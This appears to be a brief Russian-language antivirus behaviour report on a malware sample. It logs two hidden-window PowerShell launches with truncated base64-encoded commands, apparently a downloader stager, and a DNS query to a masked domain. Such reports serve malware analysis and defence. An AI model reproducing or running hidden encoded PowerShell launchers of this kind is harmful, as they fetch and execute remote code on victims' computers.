Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -Enc WwBTAHkAUwB0AGUAbQAuAE4AZQB0AC4AUwBFAFIAVgBJAGMARQBQAG8ASQBuAHQATQBBAG4AYQBHAGUAUgBdADoAOgBFAHgAcABFAGMAVAAxADAAMABDAE8ATgBUAGkAbgB1AGUAIAA9ACAAMAA7ACQAVwBDAD0ATg...
- DNS ASK co###xnews.ca
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -Enc WwBTAHkAUwB0AGUAbQAuAE4AZQB0AC4AUwBFAFIAVgBJAGMARQBQAG8ASQBuAHQATQBBAG4AYQBHAGUAUgBdADoAOgBFAHgAcABFAGMAVAAxADAAMABDAE8ATgBUAGkAbgB1AGUAIAA9ACAAMAA7ACQAVwBDAD0ATg... (со скрытым окном)